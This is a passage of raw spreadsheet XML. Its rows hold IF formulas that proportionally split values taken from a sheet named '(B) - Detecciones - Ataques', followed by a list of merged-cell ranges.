        <f>IF('(B) - Detecciones - Ataques'!HQ95&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ95*'(B) - Detecciones - Ataques'!HO95/('(B) - Detecciones - Ataques'!HN95+'(B) - Detecciones - Ataques'!HO95),0)</f>
        <v>0</v>
      </c>
      <c r="EM103" s="571"/>
    </row>
    <row r="104">
      <c r="EJ104" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ96&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ96*'(B) - Detecciones - Ataques'!HN96/('(B) - Detecciones - Ataques'!HN96+'(B) - Detecciones - Ataques'!HO96),0)</f>
        <v>1</v>
      </c>
      <c r="EK104" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ96&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ96*'(B) - Detecciones - Ataques'!HO96/('(B) - Detecciones - Ataques'!HN96+'(B) - Detecciones - Ataques'!HO96),0)</f>
        <v>0</v>
      </c>
      <c r="EM104" s="571"/>
    </row>
    <row r="105">
      <c r="EJ105" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ97&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ97*'(B) - Detecciones - Ataques'!HN97/('(B) - Detecciones - Ataques'!HN97+'(B) - Detecciones - Ataques'!HO97),0)</f>
        <v>0</v>
      </c>
      <c r="EK105" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ97&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ97*'(B) - Detecciones - Ataques'!HO97/('(B) - Detecciones - Ataques'!HN97+'(B) - Detecciones - Ataques'!HO97),0)</f>
        <v>0</v>
      </c>
      <c r="EM105" s="571"/>
    </row>
    <row r="106">
      <c r="EJ106" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ98&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ98*'(B) - Detecciones - Ataques'!HN98/('(B) - Detecciones - Ataques'!HN98+'(B) - Detecciones - Ataques'!HO98),0)</f>
        <v>0</v>
      </c>
      <c r="EK106" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ98&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ98*'(B) - Detecciones - Ataques'!HO98/('(B) - Detecciones - Ataques'!HN98+'(B) - Detecciones - Ataques'!HO98),0)</f>
        <v>1</v>
      </c>
      <c r="EM106" s="571"/>
    </row>
    <row r="107">
      <c r="EJ107" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ99&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ99*'(B) - Detecciones - Ataques'!HN99/('(B) - Detecciones - Ataques'!HN99+'(B) - Detecciones - Ataques'!HO99),0)</f>
        <v>0</v>
      </c>
      <c r="EK107" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ99&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ99*'(B) - Detecciones - Ataques'!HO99/('(B) - Detecciones - Ataques'!HN99+'(B) - Detecciones - Ataques'!HO99),0)</f>
        <v>0</v>
      </c>
      <c r="EM107" s="571"/>
    </row>
    <row r="108">
      <c r="EJ108" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ100&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ100*'(B) - Detecciones - Ataques'!HN100/('(B) - Detecciones - Ataques'!HN100+'(B) - Detecciones - Ataques'!HO100),0)</f>
        <v>0</v>
      </c>
      <c r="EK108" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ100&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ100*'(B) - Detecciones - Ataques'!HO100/('(B) - Detecciones - Ataques'!HN100+'(B) - Detecciones - Ataques'!HO100),0)</f>
        <v>0</v>
      </c>
      <c r="EM108" s="571"/>
    </row>
    <row r="109">
      <c r="EJ109" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ101&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ101*'(B) - Detecciones - Ataques'!HN101/('(B) - Detecciones - Ataques'!HN101+'(B) - Detecciones - Ataques'!HO101),0)</f>
        <v>0</v>
      </c>
      <c r="EK109" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ101&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ101*'(B) - Detecciones - Ataques'!HO101/('(B) - Detecciones - Ataques'!HN101+'(B) - Detecciones - Ataques'!HO101),0)</f>
        <v>0</v>
      </c>
      <c r="EM109" s="571"/>
    </row>
    <row r="110">
      <c r="EJ110" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ102&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ102*'(B) - Detecciones - Ataques'!HN102/('(B) - Detecciones - Ataques'!HN102+'(B) - Detecciones - Ataques'!HO102),0)</f>
        <v>0</v>
      </c>
      <c r="EK110" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ102&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ102*'(B) - Detecciones - Ataques'!HO102/('(B) - Detecciones - Ataques'!HN102+'(B) - Detecciones - Ataques'!HO102),0)</f>
        <v>0</v>
      </c>
      <c r="EM110" s="571"/>
    </row>
    <row r="111">
      <c r="EJ111" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ103&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ103*'(B) - Detecciones - Ataques'!HN103/('(B) - Detecciones - Ataques'!HN103+'(B) - Detecciones - Ataques'!HO103),0)</f>
        <v>0</v>
      </c>
      <c r="EK111" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ103&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ103*'(B) - Detecciones - Ataques'!HO103/('(B) - Detecciones - Ataques'!HN103+'(B) - Detecciones - Ataques'!HO103),0)</f>
        <v>0</v>
      </c>
      <c r="EM111" s="571"/>
    </row>
    <row r="112">
      <c r="EJ112" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ104&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ104*'(B) - Detecciones - Ataques'!HN104/('(B) - Detecciones - Ataques'!HN104+'(B) - Detecciones - Ataques'!HO104),0)</f>
        <v>0</v>
      </c>
      <c r="EK112" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ104&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ104*'(B) - Detecciones - Ataques'!HO104/('(B) - Detecciones - Ataques'!HN104+'(B) - Detecciones - Ataques'!HO104),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="113">
      <c r="EJ113" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ105&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ105*'(B) - Detecciones - Ataques'!HN105/('(B) - Detecciones - Ataques'!HN105+'(B) - Detecciones - Ataques'!HO105),0)</f>
        <v>0</v>
      </c>
      <c r="EK113" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ105&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ105*'(B) - Detecciones - Ataques'!HO105/('(B) - Detecciones - Ataques'!HN105+'(B) - Detecciones - Ataques'!HO105),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="114">
      <c r="EJ114" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ106&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ106*'(B) - Detecciones - Ataques'!HN106/('(B) - Detecciones - Ataques'!HN106+'(B) - Detecciones - Ataques'!HO106),0)</f>
        <v>0</v>
      </c>
      <c r="EK114" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ106&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ106*'(B) - Detecciones - Ataques'!HO106/('(B) - Detecciones - Ataques'!HN106+'(B) - Detecciones - Ataques'!HO106),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="115">
      <c r="EJ115" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ107&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ107*'(B) - Detecciones - Ataques'!HN107/('(B) - Detecciones - Ataques'!HN107+'(B) - Detecciones - Ataques'!HO107),0)</f>
        <v>0</v>
      </c>
      <c r="EK115" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ107&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ107*'(B) - Detecciones - Ataques'!HO107/('(B) - Detecciones - Ataques'!HN107+'(B) - Detecciones - Ataques'!HO107),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="116">
      <c r="EJ116" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ108&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ108*'(B) - Detecciones - Ataques'!HN108/('(B) - Detecciones - Ataques'!HN108+'(B) - Detecciones - Ataques'!HO108),0)</f>
        <v>0</v>
      </c>
      <c r="EK116" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ108&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ108*'(B) - Detecciones - Ataques'!HO108/('(B) - Detecciones - Ataques'!HN108+'(B) - Detecciones - Ataques'!HO108),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="117">
      <c r="EJ117" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ109&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ109*'(B) - Detecciones - Ataques'!HN109/('(B) - Detecciones - Ataques'!HN109+'(B) - Detecciones - Ataques'!HO109),0)</f>
        <v>1</v>
      </c>
      <c r="EK117" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ109&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ109*'(B) - Detecciones - Ataques'!HO109/('(B) - Detecciones - Ataques'!HN109+'(B) - Detecciones - Ataques'!HO109),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="118">
      <c r="EJ118" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ110&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ110*'(B) - Detecciones - Ataques'!HN110/('(B) - Detecciones - Ataques'!HN110+'(B) - Detecciones - Ataques'!HO110),0)</f>
        <v>1</v>
      </c>
      <c r="EK118" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ110&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ110*'(B) - Detecciones - Ataques'!HO110/('(B) - Detecciones - Ataques'!HN110+'(B) - Detecciones - Ataques'!HO110),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="119">
      <c r="EJ119" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ111&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ111*'(B) - Detecciones - Ataques'!HN111/('(B) - Detecciones - Ataques'!HN111+'(B) - Detecciones - Ataques'!HO111),0)</f>
        <v>0</v>
      </c>
      <c r="EK119" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ111&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ111*'(B) - Detecciones - Ataques'!HO111/('(B) - Detecciones - Ataques'!HN111+'(B) - Detecciones - Ataques'!HO111),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="120">
      <c r="EJ120" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ112&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ112*'(B) - Detecciones - Ataques'!HN112/('(B) - Detecciones - Ataques'!HN112+'(B) - Detecciones - Ataques'!HO112),0)</f>
        <v>0</v>
      </c>
      <c r="EK120" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ112&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ112*'(B) - Detecciones - Ataques'!HO112/('(B) - Detecciones - Ataques'!HN112+'(B) - Detecciones - Ataques'!HO112),0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="121">
      <c r="EJ121" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ113&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ113*'(B) - Detecciones - Ataques'!HN113/('(B) - Detecciones - Ataques'!HN113+'(B) - Detecciones - Ataques'!HO113),0)</f>
        <v>0</v>
      </c>
      <c r="EK121" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ113&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ113*'(B) - Detecciones - Ataques'!HO113/('(B) - Detecciones - Ataques'!HN113+'(B) - Detecciones - Ataques'!HO113),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="122">
      <c r="EJ122" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ114&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ114*'(B) - Detecciones - Ataques'!HN114/('(B) - Detecciones - Ataques'!HN114+'(B) - Detecciones - Ataques'!HO114),0)</f>
        <v>0</v>
      </c>
      <c r="EK122" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ114&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ114*'(B) - Detecciones - Ataques'!HO114/('(B) - Detecciones - Ataques'!HN114+'(B) - Detecciones - Ataques'!HO114),0)</f>
        <v>0.2727272727</v>
      </c>
    </row>
    <row r="123">
      <c r="EJ123" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ115&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ115*'(B) - Detecciones - Ataques'!HN115/('(B) - Detecciones - Ataques'!HN115+'(B) - Detecciones - Ataques'!HO115),0)</f>
        <v>0</v>
      </c>
      <c r="EK123" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ115&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ115*'(B) - Detecciones - Ataques'!HO115/('(B) - Detecciones - Ataques'!HN115+'(B) - Detecciones - Ataques'!HO115),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="124">
      <c r="EJ124" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ116&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ116*'(B) - Detecciones - Ataques'!HN116/('(B) - Detecciones - Ataques'!HN116+'(B) - Detecciones - Ataques'!HO116),0)</f>
        <v>0</v>
      </c>
      <c r="EK124" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ116&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ116*'(B) - Detecciones - Ataques'!HO116/('(B) - Detecciones - Ataques'!HN116+'(B) - Detecciones - Ataques'!HO116),0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="125">
      <c r="EJ125" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ117&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ117*'(B) - Detecciones - Ataques'!HN117/('(B) - Detecciones - Ataques'!HN117+'(B) - Detecciones - Ataques'!HO117),0)</f>
        <v>0</v>
      </c>
      <c r="EK125" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ117&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ117*'(B) - Detecciones - Ataques'!HO117/('(B) - Detecciones - Ataques'!HN117+'(B) - Detecciones - Ataques'!HO117),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="126">
      <c r="EJ126" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ118&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ118*'(B) - Detecciones - Ataques'!HN118/('(B) - Detecciones - Ataques'!HN118+'(B) - Detecciones - Ataques'!HO118),0)</f>
        <v>0</v>
      </c>
      <c r="EK126" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ118&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ118*'(B) - Detecciones - Ataques'!HO118/('(B) - Detecciones - Ataques'!HN118+'(B) - Detecciones - Ataques'!HO118),0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="127">
      <c r="EJ127" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ119&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ119*'(B) - Detecciones - Ataques'!HN119/('(B) - Detecciones - Ataques'!HN119+'(B) - Detecciones - Ataques'!HO119),0)</f>
        <v>0</v>
      </c>
      <c r="EK127" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ119&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ119*'(B) - Detecciones - Ataques'!HO119/('(B) - Detecciones - Ataques'!HN119+'(B) - Detecciones - Ataques'!HO119),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="128">
      <c r="EJ128" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ120&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ120*'(B) - Detecciones - Ataques'!HN120/('(B) - Detecciones - Ataques'!HN120+'(B) - Detecciones - Ataques'!HO120),0)</f>
        <v>0</v>
      </c>
      <c r="EK128" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ120&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ120*'(B) - Detecciones - Ataques'!HO120/('(B) - Detecciones - Ataques'!HN120+'(B) - Detecciones - Ataques'!HO120),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="129">
      <c r="EJ129" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ121&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ121*'(B) - Detecciones - Ataques'!HN121/('(B) - Detecciones - Ataques'!HN121+'(B) - Detecciones - Ataques'!HO121),0)</f>
        <v>0</v>
      </c>
      <c r="EK129" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ121&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ121*'(B) - Detecciones - Ataques'!HO121/('(B) - Detecciones - Ataques'!HN121+'(B) - Detecciones - Ataques'!HO121),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="130">
      <c r="EJ130" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ122&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ122*'(B) - Detecciones - Ataques'!HN122/('(B) - Detecciones - Ataques'!HN122+'(B) - Detecciones - Ataques'!HO122),0)</f>
        <v>0</v>
      </c>
      <c r="EK130" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ122&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ122*'(B) - Detecciones - Ataques'!HO122/('(B) - Detecciones - Ataques'!HN122+'(B) - Detecciones - Ataques'!HO122),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="131">
      <c r="EJ131" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ123&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ123*'(B) - Detecciones - Ataques'!HN123/('(B) - Detecciones - Ataques'!HN123+'(B) - Detecciones - Ataques'!HO123),0)</f>
        <v>0.05366134369</v>
      </c>
      <c r="EK131" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ123&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ123*'(B) - Detecciones - Ataques'!HO123/('(B) - Detecciones - Ataques'!HN123+'(B) - Detecciones - Ataques'!HO123),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="132">
      <c r="EJ132" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ124&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ124*'(B) - Detecciones - Ataques'!HN124/('(B) - Detecciones - Ataques'!HN124+'(B) - Detecciones - Ataques'!HO124),0)</f>
        <v>0</v>
      </c>
      <c r="EK132" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ124&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ124*'(B) - Detecciones - Ataques'!HO124/('(B) - Detecciones - Ataques'!HN124+'(B) - Detecciones - Ataques'!HO124),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="133">
      <c r="EJ133" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ125&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ125*'(B) - Detecciones - Ataques'!HN125/('(B) - Detecciones - Ataques'!HN125+'(B) - Detecciones - Ataques'!HO125),0)</f>
        <v>0.009272816008</v>
      </c>
      <c r="EK133" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ125&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ125*'(B) - Detecciones - Ataques'!HO125/('(B) - Detecciones - Ataques'!HN125+'(B) - Detecciones - Ataques'!HO125),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="134">
      <c r="EJ134" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ126&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ126*'(B) - Detecciones - Ataques'!HN126/('(B) - Detecciones - Ataques'!HN126+'(B) - Detecciones - Ataques'!HO126),0)</f>
        <v>0.08791366906</v>
      </c>
      <c r="EK134" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ126&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ126*'(B) - Detecciones - Ataques'!HO126/('(B) - Detecciones - Ataques'!HN126+'(B) - Detecciones - Ataques'!HO126),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="135">
      <c r="EJ135" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ127&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ127*'(B) - Detecciones - Ataques'!HN127/('(B) - Detecciones - Ataques'!HN127+'(B) - Detecciones - Ataques'!HO127),0)</f>
        <v>0.01558441558</v>
      </c>
      <c r="EK135" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ127&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ127*'(B) - Detecciones - Ataques'!HO127/('(B) - Detecciones - Ataques'!HN127+'(B) - Detecciones - Ataques'!HO127),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="136">
      <c r="EJ136" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ128&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ128*'(B) - Detecciones - Ataques'!HN128/('(B) - Detecciones - Ataques'!HN128+'(B) - Detecciones - Ataques'!HO128),0)</f>
        <v>0</v>
      </c>
      <c r="EK136" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ128&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ128*'(B) - Detecciones - Ataques'!HO128/('(B) - Detecciones - Ataques'!HN128+'(B) - Detecciones - Ataques'!HO128),0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="137">
      <c r="EJ137" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ129&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ129*'(B) - Detecciones - Ataques'!HN129/('(B) - Detecciones - Ataques'!HN129+'(B) - Detecciones - Ataques'!HO129),0)</f>
        <v>0</v>
      </c>
      <c r="EK137" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ129&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ129*'(B) - Detecciones - Ataques'!HO129/('(B) - Detecciones - Ataques'!HN129+'(B) - Detecciones - Ataques'!HO129),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="138">
      <c r="EJ138" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ130&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ130*'(B) - Detecciones - Ataques'!HN130/('(B) - Detecciones - Ataques'!HN130+'(B) - Detecciones - Ataques'!HO130),0)</f>
        <v>0</v>
      </c>
      <c r="EK138" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ130&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ130*'(B) - Detecciones - Ataques'!HO130/('(B) - Detecciones - Ataques'!HN130+'(B) - Detecciones - Ataques'!HO130),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="139">
      <c r="EJ139" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ131&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ131*'(B) - Detecciones - Ataques'!HN131/('(B) - Detecciones - Ataques'!HN131+'(B) - Detecciones - Ataques'!HO131),0)</f>
        <v>0</v>
      </c>
      <c r="EK139" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ131&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ131*'(B) - Detecciones - Ataques'!HO131/('(B) - Detecciones - Ataques'!HN131+'(B) - Detecciones - Ataques'!HO131),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="140">
      <c r="EJ140" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ132&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ132*'(B) - Detecciones - Ataques'!HN132/('(B) - Detecciones - Ataques'!HN132+'(B) - Detecciones - Ataques'!HO132),0)</f>
        <v>0</v>
      </c>
      <c r="EK140" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ132&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ132*'(B) - Detecciones - Ataques'!HO132/('(B) - Detecciones - Ataques'!HN132+'(B) - Detecciones - Ataques'!HO132),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="141">
      <c r="EJ141" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ133&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ133*'(B) - Detecciones - Ataques'!HN133/('(B) - Detecciones - Ataques'!HN133+'(B) - Detecciones - Ataques'!HO133),0)</f>
        <v>0</v>
      </c>
      <c r="EK141" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ133&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ133*'(B) - Detecciones - Ataques'!HO133/('(B) - Detecciones - Ataques'!HN133+'(B) - Detecciones - Ataques'!HO133),0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="142">
      <c r="EJ142" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ134&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ134*'(B) - Detecciones - Ataques'!HN134/('(B) - Detecciones - Ataques'!HN134+'(B) - Detecciones - Ataques'!HO134),0)</f>
        <v>1</v>
      </c>
      <c r="EK142" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ134&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ134*'(B) - Detecciones - Ataques'!HO134/('(B) - Detecciones - Ataques'!HN134+'(B) - Detecciones - Ataques'!HO134),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="143">
      <c r="EJ143" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ135&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ135*'(B) - Detecciones - Ataques'!HN135/('(B) - Detecciones - Ataques'!HN135+'(B) - Detecciones - Ataques'!HO135),0)</f>
        <v>0</v>
      </c>
      <c r="EK143" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ135&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ135*'(B) - Detecciones - Ataques'!HO135/('(B) - Detecciones - Ataques'!HN135+'(B) - Detecciones - Ataques'!HO135),0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="144">
      <c r="EJ144" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ136&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ136*'(B) - Detecciones - Ataques'!HN136/('(B) - Detecciones - Ataques'!HN136+'(B) - Detecciones - Ataques'!HO136),0)</f>
        <v>0</v>
      </c>
      <c r="EK144" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ136&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ136*'(B) - Detecciones - Ataques'!HO136/('(B) - Detecciones - Ataques'!HN136+'(B) - Detecciones - Ataques'!HO136),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="145">
      <c r="EJ145" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ137&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ137*'(B) - Detecciones - Ataques'!HN137/('(B) - Detecciones - Ataques'!HN137+'(B) - Detecciones - Ataques'!HO137),0)</f>
        <v>0</v>
      </c>
      <c r="EK145" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ137&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ137*'(B) - Detecciones - Ataques'!HO137/('(B) - Detecciones - Ataques'!HN137+'(B) - Detecciones - Ataques'!HO137),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="146">
      <c r="EJ146" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ138&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ138*'(B) - Detecciones - Ataques'!HN138/('(B) - Detecciones - Ataques'!HN138+'(B) - Detecciones - Ataques'!HO138),0)</f>
        <v>1</v>
      </c>
      <c r="EK146" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ138&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ138*'(B) - Detecciones - Ataques'!HO138/('(B) - Detecciones - Ataques'!HN138+'(B) - Detecciones - Ataques'!HO138),0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="147">
      <c r="EJ147" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ139&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ139*'(B) - Detecciones - Ataques'!HN139/('(B) - Detecciones - Ataques'!HN139+'(B) - Detecciones - Ataques'!HO139),0)</f>
        <v>0</v>
      </c>
      <c r="EK147" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ139&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ139*'(B) - Detecciones - Ataques'!HO139/('(B) - Detecciones - Ataques'!HN139+'(B) - Detecciones - Ataques'!HO139),0)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="23">
    <mergeCell ref="G15:U15"/>
    <mergeCell ref="W15:CY15"/>
    <mergeCell ref="D19:E19"/>
    <mergeCell ref="G20:U20"/>
    <mergeCell ref="W20:CY20"/>
    <mergeCell ref="D24:E24"/>
    <mergeCell ref="O62:AB62"/>
    <mergeCell ref="DW6:DY6"/>
    <mergeCell ref="D7:E7"/>
    <mergeCell ref="G7:U7"/>
    <mergeCell ref="W7:CY7"/>
    <mergeCell ref="DC7:DD7"/>
    <mergeCell ref="DO7:DP7"/>
    <mergeCell ref="DR7:DS7"/>
    <mergeCell ref="FC97:FE117"/>
    <mergeCell ref="FC120:FE140"/>
